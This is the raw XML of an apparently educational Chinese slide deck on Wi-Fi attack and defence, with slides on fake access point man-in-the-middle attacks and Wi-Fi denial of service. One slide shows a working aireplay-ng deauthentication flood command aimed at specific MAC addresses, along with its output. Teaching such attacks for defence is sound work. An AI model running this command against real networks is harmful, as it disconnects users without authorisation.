          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#   www.myhostname.com AAAA 2001:db8::1                                    #</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#   *.foo.com          AAAA 2001:db8::2                                    #</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#                                                                          #</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t># or to skip a protocol family (useful with dual-stack):                   #</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#   www.hotmail.com    AAAA ::                                             #</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#   www.yahoo.com      A    0.0.0.0                                        #</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#                                    </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="140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1922780" y="453390"/>
            <a:ext cx="48514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000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Fake AP MITM </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="4000" b="1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392555" y="2221230"/>
            <a:ext cx="800227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5400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                 Demo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="54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1903730" y="481965"/>
            <a:ext cx="48514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000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Wifi-DOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>攻击</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000" b="1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38785" y="1613535"/>
            <a:ext cx="76161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bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Deauth Flood</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>：由于未加密的管理帧，允许接收第三方的解除关联帧</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.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38785" y="2067560"/>
            <a:ext cx="5579745" cy="19069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>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>➜  ~ sudo aireplay-ng -0 20 -a BC:D1:77:17:7C:B4 -c B4:0B:44:C2:D5:FF wlan0mon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10:43:20  Waiting for beacon frame (BSSID: BC:D1:77:17:7C:B4) on channel 6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10:43:21  Sending 64 directed DeAuth (code 7). STMAC: [B4:0B:44:C2:D5:FF] [ 1|63 ACKs]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10:43:21  Sending 64 directed DeAuth (code 7). STMAC: [B4:0B:44:C2:D5:FF] [ 0|62 ACKs]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10:43:22  Sending 64 directed DeAuth (code 7). STMAC: [B4:0B:44:C2:D5:FF] [14|61 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5" descr="微信截图_2018081012051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20940" y="1452880"/>
            <a:ext cx="4601210" cy="5344160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6" descr="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535" y="3454400"/>
            <a:ext cx="6766560" cy="327977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星, 户外艺术系列&#10;&#10;已生成高可信度的说明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335" y="0"/>
            <a:ext cx="12376484" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="组合 8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1265555" y="1826895"/>
            <a:ext cx="7798025" cy="4067810"/>
            <a:chOff x="2848825" y="2258020"/>
            <a:chExt cx="5761775" cy="1803668"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="文本框 23"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4147480" y="2258020"/>
              <a:ext cx="3334559" cy="4088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5400" b="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>Part 02</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="5400" b="1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4" name="文本框 25"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2848825" y="3058774"/>
              <a:ext cx="4209071" cy="2587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zh-CN" altLang="en-US" sz="3200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>二</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>.</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>无线攻防的进阶</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" b="1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5" name="文本框 26"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3581400" y="3755122"/>
              <a:ext cx="5029200" cy="3065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60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pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3" descr="微信图片_201806281745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970" y="0"/>
            <a:ext cx="2033905" cy="203390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249930" y="5203190"/>
            <a:ext cx="14662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bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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0">
        <p15:prstTrans prst="fallOver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WPS 演示</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>317</Paragraphs>
  <Slides>20</Slides>
  <Notes>25</Notes>
  <HiddenSlides>0</HiddenSlides>
  <MMClips>1</MMClips>
  <ScaleCrop>false</ScaleCrop>
  <HeadingPairs>
    <vt:vector size="6" baseType="variant">
      <vt:variant>
        <vt:lpstr>已用的字体</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>34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47</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="82" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Roboto</vt:lpstr>
      <vt:lpstr>Lato Regular</vt:lpstr>
      <vt:lpstr>Lato Hairline</vt:lpstr>
      <vt:lpstr>Lato Light</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>FontAwesome</vt:lpstr>
      <vt:lpstr>Gill Sans</vt:lpstr>
      <vt:lpstr>Lato Black</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>Century Gothic</vt:lpstr>
      <vt:lpstr>Lato Light</vt:lpstr>
      <vt:lpstr>Gill Sans</vt:lpstr>
      <vt:lpstr>Agency FB</vt:lpstr>
      <vt:lpstr>华文宋体</vt:lpstr>
      <vt:lpstr>微软雅黑 Light</vt:lpstr>
      <vt:lpstr>创艺简细圆</vt:lpstr>
      <vt:lpstr>Bebas</vt:lpstr>
      <vt:lpstr>华文黑体</vt:lpstr>
      <vt:lpstr>Arial Black</vt:lpstr>
      <vt:lpstr>Kartika</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Wide Latin</vt:lpstr>
      <vt:lpstr>Open Sans</vt:lpstr>
      <vt:lpstr>黑体</vt:lpstr>
      <vt:lpstr>Segoe Print</vt:lpstr>
      <vt:lpstr>Gill Sans MT</vt:lpstr>
      <vt:lpstr>Times</vt:lpstr>
      <vt:lpstr>Times New Roman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王欣蕾</dc:creator>
  <cp:lastModifiedBy>XinSai</cp:lastModifiedBy>
  <cp:revision>131</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-02-19T15:11:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-08-12T14:43:04Z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2052-10.1.0.7400</vt:lpwstr>
  </property>
</Properties>
</file>